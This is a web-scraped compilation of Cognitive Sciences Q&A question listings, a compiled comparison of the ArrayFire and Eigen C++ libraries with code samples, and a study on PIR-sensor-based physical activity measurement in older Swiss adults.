Well that's embarrassing. Thanks for pointing that out.
|
# All Questions
137 views
### Are there any cognitive models for image interpretation?
Are there any cognitive models which can be used for image interpretation. I have tried to find some specific models which can be used for image interpretation but have not been able to find any ...
27 views
### Technical term for the loss of words in your mother-tongue when speaking a different language
I am basically looking for two words which are, though, related to some degree. It might even be that ultimately the same word is the answer to both parts of this question. I split them up into two ...
12 views
### Is it possible to devise a scientifically valid model for personality preferences or tendencies? [duplicate]
I have been interested in preferences, personality types and related topics for about two years, mainly as a by-product of a personal introspection process. For a long while, I have been quite ...
209 views
### Why do people suddenly look back if you look at them for a while?
You possibly are familiar with the following situation; I do not know if this is a researched phenomenon or not, however. You look straight at somebody for some time and suddenly, even though he or she ...
35 views
### How exactly do men recognize others' IQ by just looking at a picture? [closed]
http://www.policymic.com/articles/86593/you-can-predict-this-man-s-iq-just-by-looking-at-his-picture?utm_source=policymicFB&utm_medium=main&utm_campaign=social Claims that humans can ...
23 views
### How to select vocabulary items for a test designed to expand vocabulary in English as a second language students?
I am developing a personalized android program designed to expand vocabulary for students learning English as a second language. It includes "story-reading" and "word-meaning quizzes". First, ...
33 views
### What is the relationship between topographic maps and sensory memory?
Sensory maps are defined functionally: they exist for a certain time window, are overwritten quickly, are generally inaccessible to introspective control. Topographic maps are defined biologically: ...
19 views
### What makes a sight or an image mesmerizing and irresistible?
There are some examples of this. What makes us: Feel we just HAVE TO watch that video or an image again, it's common with comedy videos Feel we need to stare at a such a beautiful sight, a person ...
32 views
### What is the actual name of the condition where one has the absolute desire to be in a group?
Is the following a medical condition by itself, and if so, what could be its name? If not, how can it be described? There are 3 groups in a set of people (...
5k views
### Is leg jiggling a focus aid?
This is slightly left-field, but I am interested in the Cognitive Science implications of this question: Many people, myself included, are "leg jigglers", meaning we often sit jiggling or bouncing a ...
327 views
### Have humans always had problems with motivation and laziness?
I originally wanted to ask a question "Is there a drug for motivation or laziness", but google search revealed that people have been asking this question for years and there's no drug that is ...
20 views
### How exactly are socionics and MBTI different?
Socionics superficially looks exactly as MBTI. 8 functions, 16 personality types. There's even a table, perfectly corresponding socionics types with MBTI types. Then what makes socionics and MBTI ...
19 views
### Where to obtain full set of IPIP items on the internet?
I heard that IPIP project consists of 2600 public domain questions. Where I can find download those questions? Is there any web address?
15 views
### Are there lying or social desirability items in IPIP pool?
Are there any lie or social desirable questions in the IPIP pool of 2600 question? Can I construct psychometrically such a scale if it does not exists by default?
45 views
### Are there studies on international differences on sexualization?
With sexualization, I mean the reaction that one has when seeing the desired sexual object. I guess that in some countries, their cultures may have softer reactions, while in others, a stronger ...
4k views
### Free online intelligence test with norm table, high reliability, and must be printable?
I am looking for a general intelligence test which meets the following requirements: available online for free there is a table which translates "points" to IQ (I don't want a hidden online ...
17 views
### Vivid dreams by electric shocks?
what told me in a comment, that of course anything that will disturb your sleep but not quite wake you will induce vivid dreams, because vivid dreams happen in the shallow sleep phases. I agree, ...
25 views
### Need a definition of Cognitive Simplicity (or Complexity) that would appeal to a wide audience
Everyone in my organization wants to make our products & website as simple as possible for our customers. My concern is that "simple" means different things to different people. I'm looking for a ...
90 views
### Is there psychological research on seduction?
I've been reading a lot of books about seduction. Most of them rely on (approximative) psychological basis and presents really interesting insights. Robert Greene - Art of seduction, for example ...
22 views
### Is the book “The Cambridge Handbook of Expertise and Expert Performance” worth reading?
I do not know whether this is the most appropriate place to post this question, but since the book is related to psychology, I will post it here. If there is a more appropriate place to ask this ...
43 views
### Technical term for the temporary loss of understanding a word
I am basically looking for two words which are related to some degree. Ultimately the same word might even be the answer to both parts of this question. I split them up into two questions (see also ...
37 views
### Why do I get smaller accuracy when I use 80% of training sets using HMAX model?
I am trying to compute the accuracy of the HMAX model. I am using the Face category (containing 435 images) from the Caltech101 database. I split it into $x$ ...
35 views
### What brain regions are activated when a dream is remembered?
Some people remember dreams, others don't. The same person can wake up with dream recall one day and without on other days. I know that the association between REM sleep and dreaming was initially ...
103 views
### Affective Neuroscience Personality Scales
I wonder if anybody could give some details about Affective Neuroscience Personality Scales. I tried to access 'The Affective Neuroscience Personality Scales: Normative Data and Implications' by ...
37 views
### Terminology for when a person starts to like something they previously didn't like due to exposure from a friend
What is the term for when a person starts to like something they previously didn't like due to exposure from a friend? What is the term for such phenomenon in social psychology? For example, I don't ...
29 views
### Forehead tingling due to nearby location of object
I have often experienced a tingling in the center of my forehead when aware of the presence of a nearby potentially dangerous object. This illusory sensation is likely a mental projection since it ...
28 views
### How does the brain know whether or not it comprehends a novel concept?
There seem to be at least two kinds of confusion regarding novel concepts. In one, the brain simply can't form an abstract model from whatever information is being presented. It's where you can't ...
58 views
### Is it possible to permanently improve long-term memory?
Many similar questions here ask either about working or short-term memory, or about various tricks and techniques to efficiently remember information. My question is, is it possible to improve the ...
25 views
### How long could Henry Molaison keep his memory of the present?
I'm talking about Henry Molaison (HM), the famous memory research patient. I hear that he could converse normally with a researcher until he "got distracted", at which point he no longer remembered ...
184 views
### Do students learn better when challenged (specifically, in math education)?
Originally posted on Math.SE, but it was suggested cogsci.SE would be a more suitable venue. I'm aware of two publications that have trickled onto the radar screens of non-specialists: Fortune ...
50 views
### Super polymath feasibility: Is it possible to have the highest intellectual ability in every area?
Could a single individual have the abilities of Gauss in mathematics, play soccer like Messi, write like Dostoyevsky, play chess like Carlsen, have ideas in physics comparable to those of Einstein, ...
8 views
### Are there any recorded cases of hearing the outside world while in a coma?
There are plenty of stories flying around of people having been in a coma, but able to hear the outside world. They usually include either hearing malicious things said by staff, or encouragement by ...
71 views
### Do introverts tend to experience more psychological problems?
Are there any evidence suggesting that the more introvert people could be more subject to psychological problems? Is possible to hypothesize that one of the causes is the lack of ideas in comparison ...
63 views
### Are there scientific alternatives to Neuro-Linguistic Programming (NLP)?
According to these answers 1, 2 and to wikipedia, NLP seems to be a pseudoscience, which has shown no real effectiveness, and so on. Are there scientific proved alternatives to NLP?
41 views
### Which are the most accredited tests for measuring personality traits?
I lack an academic background. I thought there were only 4 or 16 personality traits. But a fast search on Google shows a huge number: according to this link there should be 638. Is this ...
19 views
### Where to find statistical prevalence data for psychopathology over time?
Are there any places where is possible to find historical data for trends of psychological disease? For example some Google website (similar to google trends or NGrams)
20 views
### Are antidepressants and anxiolytics helping cognitive restructuring?
After an anxiety attack, a prescription of antidepressants, anxiolytics and psychotherapy is common. In the case of cognitive-behavioural therapy, is the usage of this pharmacological device making ...
26 views
### Is psychology already using machine learning, neural network and data-mining?
For who doesn't know the concepts presented by machine learning, neural network, data-mining or artificial intelligence techniques 20 Question can be a nice point to start from. It's a website ...
22 views
### What are the effects of antipsychotic medication on brain volume?
I have read numerous different papers each claiming that antipsychotic medication either helps maintain brain volume or causes brain volume reduction in patients with schizophrenia and other psychotic ...
32 views
### How is “mislabeling” cognitive distortion different from “labeling”?
David Burns in his book Feeling Good describes "labeling and mislabeling" cognitive distortions: Personal labeling means creating a completely negative self-image based on your errors. It is an ...
21 views
### Would a patient benefit from continuing psychotherapy even after solving his pathology?
According to this question: Would most people benefit from psychotherapy? most people would benefit from psychotherapy. I'm trying to narrow that question to only the people which have experienced ...
19 views
### Is Allen Carr's Easyway a form of cognitive therapy?
David Burns is a cognitive therapist, who in his Feeling Good describes how to overcome depression. He states that depression is a logical result of irrational negative thoughts, which can be ...
8 views
### Research: Tendency to “follow” versus “self-expression”
I am trying to research attitude towards task completion and tendency between "follow" and "self-expression". But, as you can see, I am not hitting to correct keywords to get the results I want. The ...
20 views
The following self-help books are giving some advice. The first book for having friends, reach success, reach friend approval and so on. The second for avoiding nevrosis and living better in the ...
92 views
### Where does Freud say, “The unconscious mind can only wish?”
Where does Freud say, "The unconscious mind can only wish?" I've been tasked with either agreeing or disagreeing with this statement, but I cannot find exactly where Freud is said to have made this ...
91 views
### What personality traits does sexy and revealing clothing correlate with?
Is there some unifying characteristic that distinguishes women who wear form-fitting, lowcut, see-through and other kinds of revealing outfits? Are they more extroverted, do they rate higher in ...
27 views
### Is pacemaker action potential considered a calcium dependent or sodium/calcium dependent?
Is a sinoatrial node action potential (AP) considered a Ca2+ dependent (No Na+) action potential? I was under the understanding that Ca2+ dependent APs were present only in Purkinje and endocrine ...
52 views
### Is Brain Sync music effective in increasing cognitive functioning?
From the website: BRAIN SYNC meditation CDs and guided imagery techniques are proven to significantly improve mental performance. In two decades, nearly 3 million Brain Sync users have ...
|
# ArrayFire vs Eigen

ArrayFire is a high-performance, open-source library for parallel computing with an easy-to-use API; it is used to perform array and matrix operations on GPUs and supports highly tuned, GPU-accelerated algorithms. It offers a CUDA, OpenCL and CPU back-end, so you can be sure that your code will be compatible with any machine which can install the ArrayFire binary; it integrates with any CUDA application, contains an array-based API for easy programmability, and is designed for use on the full range of systems. Eigen is a C++ template library for linear algebra: matrices, vectors, numerical solvers, and related algorithms. (A caveat on comparison-site statistics such as LibHunt's, which tracks mentions of software libraries on relevant social networks: the interest-over-time line charts are based on worldwide web search for the past 12 months, some search terms could be used in multiple areas and skew the graphs, and repository numbers such as stars, watchers, forks and release cycles only loosely reflect usage. Related projects listed alongside the pair include Haskell bindings for Eigen, by osidorkin, and for ArrayFire, by the arrayfire organization, as well as VexCL, a C++ vector expression template library for OpenCL/CUDA/OpenMP, by ddemidov.)

ArrayFire abstracts away much of the details of programming parallel architectures by providing a high-level container object, the array, that represents data stored on a CPU, GPU, FPGA, or other type of accelerator; this abstraction permits developers to write massively parallel applications without dealing with low-level kernel code. ArrayFire wraps GPU memory into this simple "array" object, enabling developers to process vectors, matrices, and volumes on the GPU using high-level routines, and tutorials typically start by showing how to install ArrayFire and use it to perform some computations on the GPU. Operations on arrays create other arrays, so data always remains on the device unless it is specifically transferred back. Declare a two-dimensional array by passing the number of rows and the number of columns as the first two parameters; the (optional) final parameter is the type of the array. ArrayFire arrays support the standard integral and complex data types found in C/C++; the default type is f32, i.e. real single-precision floating point (float), with further types including b8, 8-bit boolean values (bool), and c32, complex single-precision.
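A minimal sketch of these basics in C++ (assuming an installed ArrayFire with one of its back-ends linked, e.g. afcpu or afcuda):

```cpp
// Array creation, default dtypes, and a fused element-wise expression.
#include <arrayfire.h>
#include <cstdio>

int main() {
    // Allocate space for an array with 10 rows and 8 columns of uniform
    // random values; f32 is the default and could be omitted.
    af::array A = af::randu(10, 8, f32);

    // Element-wise work stays on the device; ArrayFire's JIT can fuse
    // this whole expression into a single kernel.
    af::array B = af::sin(A) * 2.0f + 1.0f;

    // Reductions bring results back to the host.
    float total = af::sum<float>(B);
    std::printf("sum(B) = %f\n", total);
    return 0;
}
```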
ArrayFire performs run-time analysis of your code to increase arithmetic intensity and memory throughput, while avoiding unnecessary temporary allocations; it has an internal JIT compiler to make these optimizations for you, and the project documentation describes how the ArrayFire JIT can improve the performance of your application. The API is broad; function-index entries scattered through this comparison include the phase of a number in the complex plane, bitwise and/or/not operations on inputs, left-shifting an input, interpolation across a single dimension and along two dimensions, the bilateral filter, and copying and writing values in the locations specified by sequences.

Inevitably the developers get asked questions about how ArrayFire compares to the other libraries out in the open. One post compares the performance of ArrayFire to that of BoostCompute, HSA-Bolt, Intel TBB and Thrust; other benchmarks compare ArrayFire on the GPU to ArrayFire using only the CPU across commonly used vector algorithms on three different architectures, with all runs performed on an NVIDIA A100 Tensor Core GPU and an Intel Xeon Platinum 8275CL CPU (3.00 GHz). (Phoronix-style result pages such as the LXC-UBUNTU-2204 run, 2205241-NE-LXCUBUNTU62, let you compare your own system with the phoronix-test-suite benchmark command.) The ArrayFire library also contains the popular "GFOR" for-loop for running all loop iterations simultaneously on the GPU.
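A short sketch of GFOR (the gfor/seq construct is ArrayFire's documented batching macro; the sizes here are arbitrary):

```cpp
// Doubling every column of a matrix, with all columns processed as
// simultaneous iterations of one batched loop.
#include <arrayfire.h>
using namespace af;

int main() {
    const int n = 64, m = 128;
    array A = randu(n, m);
    array B = constant(0, n, m);

    // GFOR: all m column-iterations run simultaneously on the device.
    gfor (seq i, m) {
        B(span, i) = 2.0f * A(span, i);
    }
    eval(B);  // force materialization of the batched result
    return 0;
}
```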
In detail, the eigen-decomposition $(1)$ states that, under the orthogonal similarity relation, all symmetric matrices can be classified into different equivalence classes, and for each equivalence class the representative element can be chosen to be the simple diagonal matrix $\text{diag}(\lambda_1, \ldots, \lambda_n)$.

Against this background, a recurring user question goes: "How could I obtain eigenvalues and eigenvectors using ArrayFire? It seems like there was some support before (https://www.accelereyes.com/arrayfire/c/group__factor). Given a square matrix A, I need to obtain a diagonal matrix D that contains A's 5 largest magnitude eigenvalues and a matrix V whose columns are the corresponding eigenvectors. In Matlab the code is [V,D] = eigs(A,5). In ArrayFire I use af::eigen(Values, Vectors, A). What is the order of elements in Values? In one test I …" (The accompanying old documentation example printed a small input matrix in together with its eigenvalues val and eigenvectors vec.)
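Recent open-source ArrayFire releases do not appear to expose a direct eigensolver, so one workaround is to do this step on the CPU with Eigen. A hedged sketch for a symmetric A, using Eigen's SelfAdjointEigenSolver (real Eigen API; the top-k selection and all variable names are illustrative, not the library's prescribed recipe):

```cpp
// Compute a full symmetric eigendecomposition, then keep the k = 5
// largest-magnitude eigenpairs, mimicking Matlab's eigs(A,5).
#include <Eigen/Dense>
#include <algorithm>
#include <cmath>
#include <numeric>
#include <vector>

int main() {
    const int n = 100, k = 5;
    Eigen::MatrixXd M = Eigen::MatrixXd::Random(n, n);
    Eigen::MatrixXd A = 0.5 * (M + M.transpose());  // symmetrize

    Eigen::SelfAdjointEigenSolver<Eigen::MatrixXd> es(A);
    Eigen::VectorXd evals = es.eigenvalues();    // sorted ascending
    Eigen::MatrixXd evecs = es.eigenvectors();   // columns match evals

    // Indices of the k largest-magnitude eigenvalues.
    std::vector<int> idx(n);
    std::iota(idx.begin(), idx.end(), 0);
    std::partial_sort(idx.begin(), idx.begin() + k, idx.end(),
        [&](int a, int b) { return std::abs(evals[a]) > std::abs(evals[b]); });

    Eigen::MatrixXd D = Eigen::MatrixXd::Zero(k, k);  // diagonal of eigenvalues
    Eigen::MatrixXd V(n, k);                          // matching eigenvectors
    for (int j = 0; j < k; ++j) {
        D(j, j) = evals[idx[j]];
        V.col(j) = evecs.col(idx[j]);
    }
    return 0;
}
```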
On the Eigen side: Eigen 3 is a nice C++ template library some of whose routines are parallelized, but the parallelization is OMP only, so if you intend to parallelise using MPI (and OMP) it is probably not suitable for your purpose. The nice feature of Eigen is that you can swap in a high-performance BLAS library (like MKL or OpenBLAS) for some routines. Anyway, you can get the same GEMM performance as MKL using the devel branch (or 3.3-beta1) and compiling with AVX (-mavx) and, if your CPU supports fma, -mfma; N >= 34 is the threshold to switch between Eigen's GEMM and MKL's GEMM. One user's verdict (translated from Japanese): "For beauty of syntax, Eigen was the winner: you can write really stylish code, and being header-only makes it easy to adopt. But when I want to do parallel computation with CUDA, ArrayFire feels better; the source files stay the same and you just swap the g++ linker options." A related question (translated from Russian): "If compiling Eigen with nvcc doesn't work out, is there a good guide/tutorial on smart ways of separating host and device code? I am using CUDA 5.0 RC, Visual Studio 2008, Eigen 3."

One reported pitfall: the issue only happens when MKL and ArrayFire are both used in the same code, and only the CPU computation (Eigen) is affected, not the GPU one (ArrayFire). Perhaps the ArrayFire lib exposes some symbols conflicting with MKL, so that the presence of ArrayFire messes up the MKL routines that Eigen is using. A maintainer (pavanky, commenting on Jul 2, 2016) replied: "I am really not sure if this is an ArrayFire problem."

For Julia users, ArrayFire.jl introduces an AFArray type that is a subtype of AbstractArray; this wrapper provides a simple Julian interface that aims to mimic Base Julia's versatility and ease of use. A note on correctness: sometimes ArrayFire.jl and Base Julia return marginally different values from their computation, because they may use different lower-level libraries for BLAS, FFT, etc.; for example, Julia uses OpenBLAS for BLAS operations, while ArrayFire.jl would use clBLAS for the OpenCL backend and CuBLAS for the CUDA backend. Also note that ArrayFire implements its own internal order of compute devices, thus a CUDA device ID may not be the same as an ArrayFire device ID; when switching between devices it is important to use the interoperability functions to get/set the correct device IDs, for which the ArrayFire documentation provides a quick listing.

A rough API correspondence, reconstructed (approximately) from scattered fragments of the comparison page:

| | ArrayFire (C++) | Eigen (C++) |
|---|---|---|
| Vector size | x.elements() | x.size() |
| Number of dimensions | R.ndims() | – |
| Shape of matrix | R.dims() | – |
| Number of rows | R.dims(0) | R.rows() |

Building on Windows: to do this, open the CMake GUI. Under source directory, add the path to your project; under build directory, add the path to your project and append /build. Click configure and choose a 64-bit Visual Studio generator. If configuration was successful, click generate; this will create a my-project.sln file under build. You also need to add the ArrayFire libraries to the PATH for runtime linking, usually at "C:\Program (path truncated in the source). For MKL-DNN with CMake, create a build directory and set MKLROOT. (Related build notes: the CMake configuration in OpenFAST includes find_package(BLAS required) and find_package(LAPACK required), which should find the appropriate BLAS and LAPACK libraries, including MKL; DBCSR and its dependencies can be built with the spack package manager, see spack info dbcsr for all supported variants. Commercial alternatives in this space include the IMSL Numerical Libraries, implemented in standard programming languages like C, Java, C#, .NET, Fortran, and Python, and the NAG Library.)

As a real-world application, researchers from the University of Utah recently used ArrayFire to publish results on a full-wave phase aberration correction method for transcranial high-intensity focused ultrasound (HIFU) therapies, summarized in an abstract in the Journal of Therapeutic Ultrasound.
|
# Validity of pervasive computing based continuous physical activity assessment in community-dwelling old and oldest-old
## Abstract
In older adults, physical activity is crucial for healthy aging and associated with numerous health indicators and outcomes. Regular assessments of physical activity can help detect early health-related changes and manage physical activity targeted interventions. The quantification of physical activity, however, is difficult, as commonly used self-reported measures are biased and rather imprecise point-in-time measurements. Modern alternatives are commonly based on wearable technologies, which are accurate but suffer from usability and compliance issues. In this study, we assessed the potential of an unobtrusive ambient-sensor based system for continuous, long-term physical activity quantification. Towards this goal, we analysed one year of longitudinal sensor and medical records stemming from thirteen community-dwelling old and oldest-old subjects. Based on the sensor data, the daily number of room-transitions as well as the raw sensor activity were calculated. We found the number of room-transitions, and to some degree also the raw sensor activity, to capture numerous known associations of physical activity with cognitive, well-being and motor health indicators and outcomes. The results of this study indicate that such low-cost unobtrusive ambient-sensor systems can provide an adequate approximation of older adults’ overall physical activity, sufficient to capture relevant associations with health indicators and outcomes.
## Introduction
It is commonly known and widely accepted that physical activity positively influences health. There is strong scientific evidence that physical activity reduces the risk for a variety of health outcomes like high blood pressure, type 2 diabetes, cancer, weight gain, falls, depression, loss of cognitive function or functional ability in seniors1,2. While these findings are of high relevance for all age groups, they are of special importance for the growing number of old and even more so for the oldest-old adults, especially since physical activity is a modifiable risk factor3,4. In addition, seniors are more likely to suffer from chronic diseases, experience falls or face significant cognitive decline. They are also more prone to a sedentary lifestyle5, and results of cardiorespiratory fitness measures even suggest an age-related acceleration in decline6, which might also be detectable in physical activity measures.
While it is evident that moderate-to-vigorous-intensity physical activity is usually better, research suggests that light- and moderate-intensity physical activity is still better than no physical activity in terms of health benefits2. This is important for seniors, as they may often find it difficult to engage in high-intensity physical activities such as running or aerobic exercise. Light- and moderate-intensity physical activities like cooking, vacuuming or other everyday activities constitute an important and often integral part of older adults’ total physical activity. Measuring this type of physical activity is rather difficult but may be very important for the early detection of preventable physical activity decline or to monitor the course of interventions. Today, physical activity assessments are often based on self-reporting, which is not only prone to response bias but also suffers from recall bias, especially with declining memory4,7,8,9. Frequently used alternatives are accelerometer or pedometer based7,10. While these provide objective physical activity measures in free-living conditions, they must be worn, which becomes cumbersome in long-term assessments of several months or even years and is thus often accompanied by wear-time dependent non-compliance issues10.
Advances in technology made pervasive computing feasible for technology assisted healthy aging by embedding smart microprocessor-driven computing devices in everyday objects (as for instance seen in appliances of smart homes)11. A growing body of groundbreaking research shows that such systems are not only feasible and well accepted by seniors but are also useful for the detection of emergency situations or early changes in health status9,12,13. A frequently used and increasingly commercialized technology is passive infrared (PIR) motion sensing, which is both inexpensive and unobtrusive, to an extent that people tend to forget about it14,15. In this context, PIR motion sensors work by detecting the presence of a person’s motion in an equipped room16. Besides safety applications17,18,19,20, most work in this direction primarily targeted cognitive outcomes. Galambos et al. for instance showed that changes in PIR-sensor derived motion density maps correspond to exacerbations of depression and dementia21. In a similar manner Hayes et al. demonstrated that variability in PIR-sensor derived activity and gait-speed data differed between cognitively normal subjects and those with mild cognitive impairment (MCI)22. Similarly, Urwyler et al. highlighted the difference between sensor derived activities of daily living patterns in healthy and MCI subjects23.
In this work, we assess the potential of PIR-sensors in the light of physical activity. In particular, we explore the validity and potential of unobtrusive, continuous PIR-sensor readings for physical activity quantification, targeting in-home light- and moderate-intensity physical activity. Towards this goal, we analyzed the behavior of PIR-sensor based (physical) activity metrics and compared them with a multitude of cognitive, well-being and motor-function related assessments to see whether this approximation to physical activity sufficiently captures known effects of physical activity on commonly used health indicators and outcomes. The data for the analysis stems from a naturalistic sample of thirteen community dwelling old and oldest-old Swiss subjects (age = 90.9 ± 4.3 years, female = 69.23%) from the StrongAge cohort in Olten (Switzerland). All analyzed subjects shared the same apartment layout. The subjects were monitored for the duration of one year. Simultaneously, a battery of standardized clinical tests and assessments were performed repeatedly. The resulting data was aggregated and analyzed in terms of baseline differences. In addition, physical activity data from a subject with rapid health decline was evaluated and visualized in a case study format.
## Results
Over roughly one year, more than 89’389 person-hours were recorded from the homes of thirteen old and oldest-old participants (age = 90.9 ± 4.3 years) (Table 1), all sharing the same apartment layout and sensor placement. During the same period, classic assessments of multiple health outcomes have been assessed. Two normalized PIR-sensor derived measures of physical activity were calculated. First, the daily sensor activity – measuring the time the sensors were detecting activity (Equation (1)). Second, the normalized daily number of room-transitions (measuring the hourly number of transitions between different rooms) (Equation (2)). Here, we present the resulting associations and observations between these sensor-based physical activity metrics and the classic clinical assessments (Fig. 1).
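Equations (1) and (2) themselves are not reproduced in this excerpt; a plausible form, reconstructed from the verbal descriptions above and therefore an assumption rather than the paper's exact notation, is
$$A_d = \frac{T_d^{\text{active}}}{T_d^{\text{recorded}}}, \qquad R_d = \frac{N_d^{\text{transitions}}}{T_d^{\text{recorded}}\ [\text{h}]},$$
where, for day $d$, $T_d^{\text{active}}$ denotes the total time with sensor-detected activity, $T_d^{\text{recorded}}$ the total recorded time, and $N_d^{\text{transitions}}$ the number of transitions between different rooms.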
### Cognitive function and well-being
With regard to cognitive and well-being factors, three different assessments were analysed: the Montreal Cognitive Assessment (MoCA)24, the Geriatric Depression Scale (GDS)25 and the EQ-VAS score (EQ-VAS as part of the EQ-5D-3L)26. EQ-VAS scores showed a significant correlation with the number of room-transitions (ρ = 0.593, p = 0.033). However, no associations with depression were found – as measured by the GDS. General cognitive functioning, as measured by the MoCA, was negatively correlated with the coefficient of variation (CV) of the sensor activity (ρ = −0.556, p = 0.048) as well as with the CV of the number of room-transitions (ρ = −0.587, p = 0.035).
### Motor function
Multiple motor function related factors, consisting of muscle strength (handgrip, knee extensor and hip flexor) as well as mobility measures, were examined. Mobility measures included the fall risk related timed up and go (TUG)27 test and the balance and gait focused Tinetti performance-oriented mobility assessment (POMA)28.
Amongst the measured muscle groups, right hand handgrip strength showed the strongest correlation with both physical activity measures (sensor activity: ρ = 0.692, p = 0.009; number of room-transitions: ρ = 0.775, p = 0.002). The remaining muscle groups were correlated only with the number of room-transitions metric and, apart from the right knee and right hip, also with the CV of the number of room-transitions (handgrip right: ρ = −0.648, p = 0.017; handgrip left: ρ = −0.577, p = 0.039).
Concerning the TUG times, the cognitive variant (walking while simultaneously counting backwards) had the strongest negative correlation with the number of room-transitions metric (ρ = −0.670, p = 0.012), but the times for the normal and manual TUG variants also showed significant negative correlations with the number of room-transitions (ρ = −0.599, p = 0.031 and ρ = −0.659, p = 0.014, respectively). The POMA score for gait showed a positive correlation with the number of room-transitions (ρ = 0.606, p = 0.028), but no significant correlation was found in the case of the POMA balance score.
### Case study of a subject with a rapid decline in health
Although one year is rather short to capture significant health changes in such a small population sample, the relationship between health and our physical activity metrics can be shown visually in one participant (participant 11) with a very quick and eventually fatal decline in health. In that regard we visualized the course of room-transition-based physical activity for a healthy subject (participant 9) and for the one with significant health issues (Figs 2 and 3). It is apparent not only that the participant with health issues exhibited a more sedentary lifestyle to begin with (visible in the different baseline levels of physical activity) but also that the measured physical activity decreased within a short time-frame.
## Discussion
To evaluate the feasibility and validity of PIR-sensor based physical activity assessment, we analysed the relationship of sensor-derived physical activity metrics with results from standardized clinical assessments. The results from thirteen community-dwelling seniors allowed us to evaluate whether this approach to physical activity quantification captures relationships with well-being, cognitive and motor function similar to those of conventionally measured physical activity. The main advantage of PIR-sensor based physical activity measurement over traditional methods is its ability to objectively, continuously and unobtrusively measure light- and moderate-intensity physical activity. This might allow gapless longitudinal assessment of physical activity over the course of years, and perhaps even decades, enabling early detection of declining physical activity (and, to a reasonable degree, declining general health) and improving the management of respective interventions7. In addition, it might also facilitate physical activity research in older adults.
### Clinical assessments
Fall risk, estimated by TUG times, was negatively correlated with baseline values of room-transitions, suggesting that participants with more room-transitions tended to have a lower fall risk. Similarly, gait performance, as measured by the POMA gait score, was positively correlated with room-transitions. Muscle strength measures were predominantly correlated with room-transitions, with the exception of right-hand grip strength, which also correlated with sensor activity. So far, these findings are in line with research on physical activity1,2. Interestingly, depression (measured by the GDS) showed no significant correlations, although the literature would suggest otherwise2. While this could probably be explained by the small sample size and a rather optimistic study population, it might also relate to the measured intensity of physical activity: many depression-related physiological benefits of physical activity are primarily associated with higher-intensity activity29. Similarly to the GDS, MoCA-derived cognitive functioning was not correlated with either of the baseline sensor-derived metrics, in contrast to what the physical activity literature would suggest. However, the CV of sensor activity and of room-transitions showed a strong relationship with MoCA scores, which supports multiple findings of increased behavioral variance in people with MCI21,22,23. Although highly speculative, this could suggest that variation in daily physical activity levels is an even more important hallmark of cognitive decline than low baseline physical activity levels. Self-rated health, quantified by the EQ-VAS, did show a significant correlation with the number of room-transitions, which reflects findings on health-related quality of life and physical activity30,31.
### Sensor-derived metrics
Overall, the number of room-transitions metric correlated more strongly and more frequently with clinical assessment results than the sensor activity metric did. A possible explanation is that the number of room-transitions represents a higher level of physical activity than sensor activity does. This seems plausible, since transitions between rooms require a person to be at least walking, while sensor activity could largely be generated by light-intensity physical activity. Another reason might be that the number of room-transitions is simply more comparable (less variation due to noise) between subjects: since all share the same apartment layout, a transition corresponds to largely the same movement irrespective of the person, while sensor activity may be influenced by factors such as location and, consequently, the distance and angle to the sensor. The limited body of research on the usefulness of different PIR-sensor based metrics is inconclusive. While a case study by Campbell et al. suggested that the daily number of transitions could be useful in detecting changes in health status32, other studies made similar claims about activity33 – for the sake of simplicity, we here treat the number of sensor firings and sensor activity as equivalent.
### Case study
Retrospective findings from a case study of a senior with rapidly declining health (participant 11), which eventually led to the senior’s death, showed a visible and rapid decline in both measured physical activity and repeated clinical assessments, including TUG times and muscle strength (Fig. 3). By contrast, all three measures remained approximately steady for the reference subject (participant 9). It is also noticeable that this participant’s physical activity was already low at baseline when compared to the healthy reference (see Figs 2, 3). The decline in PIR-sensor based physical activity might have appeared even more drastic if the growing number of visits from nurses, family and friends (note the dark red days throughout the second-to-last week of December in Fig. 2) had been completely excluded from the data. These results further support the intuitive assumption that fast changes in physical activity can be measured using PIR-sensor based physical activity metrics and that these changes may reflect changes in overall health, which further validates similar findings from other studies12,32,33.
### Limitations
One of the main limitations of PIR-sensor derived physical activity is that it can only measure in-home physical activity, which may not capture the whole range of physical activity a senior engages in. In addition, baseline physical activity evaluations, and thus inter-individual comparisons, will be difficult to extend to older adults with different apartment layouts. Note that this does not affect intra-individual physical activity changes and patient-specific characteristics. However, based on our observations, intra-individual change, if not induced by short-term illness (as in the highlighted case study), shows high variability and potential seasonal patterns, likely requiring data over multiple years to quantify subtler trends. Another limitation is that we cannot currently distinguish between multiple persons in the apartment; the method is therefore only applicable to seniors who live alone and do not have frequent long-term visitors who would significantly offset sensor readings. It is further unclear how the results would transfer to similarly aged populations with a different local culture, as the main assumption of this approach rests on the observation that Central European seniors spend a very significant amount of time inside their homes.
### Outlook
Future research with different senior populations will be necessary to validate the proposed physical activity assessment method and its relationship to health. In addition, it will be important to extend the monitoring duration to several years to exclude seasonal trends and to better quantify the weaker intra-individual changes, rather than just baseline differences. Especially for potential clinical applications, it would be important to validate individual changes in a larger population to identify threshold values that signify a specific risk of a health-state change. To further validate this approach, it might also be important to compare the physical activity measured by PIR-sensors with simultaneously recorded data from accelerometers or pedometers.
## Conclusion
To sum up, we found PIR-sensor based metrics of physical activity, especially the number of room-transitions, to be associated with well-being as well as cognitive and motor function. These findings are in agreement with the literature analyzing the effects of physical activity on health indicators and outcomes2. We therefore conclude that the PIR-sensor derived number of room-transitions metric serves as a sufficient approximation of true physical activity in community-dwelling Swiss seniors. Findings from a case study, and related findings from other studies that employed similar sensor setups12,32,33, further confirm such a link between PIR-sensor measures and various health indicators and outcomes. Thus, PIR-sensor based assessment of physical activity could be a cost-effective and plausible approach for continuous, objective and unobtrusive long-term assessment of light- and moderate-intensity physical activity, which avoids the downsides of commonly used methods and has the potential to aid technology-assisted healthy aging.
## Methods
### Participants
The data presented here stem from a study in which thirteen Swiss community-dwelling seniors were equipped with pervasive computing systems for approximately one year. Inclusion criteria were age (≥80 years), the ability to live in one’s own apartment or house, and living alone. Recruitment aimed at a naturalistic sample of community-dwelling older adults living alone in central Switzerland, irrespective of their cognitive status.
The related study was conducted according to the principles of the Declaration of Helsinki and approved by the Ethics Committee of the canton of Bern, Switzerland (KEK-ID: 2016-00406). All subjects provided written informed consent before study participation.
### Clinical assessments
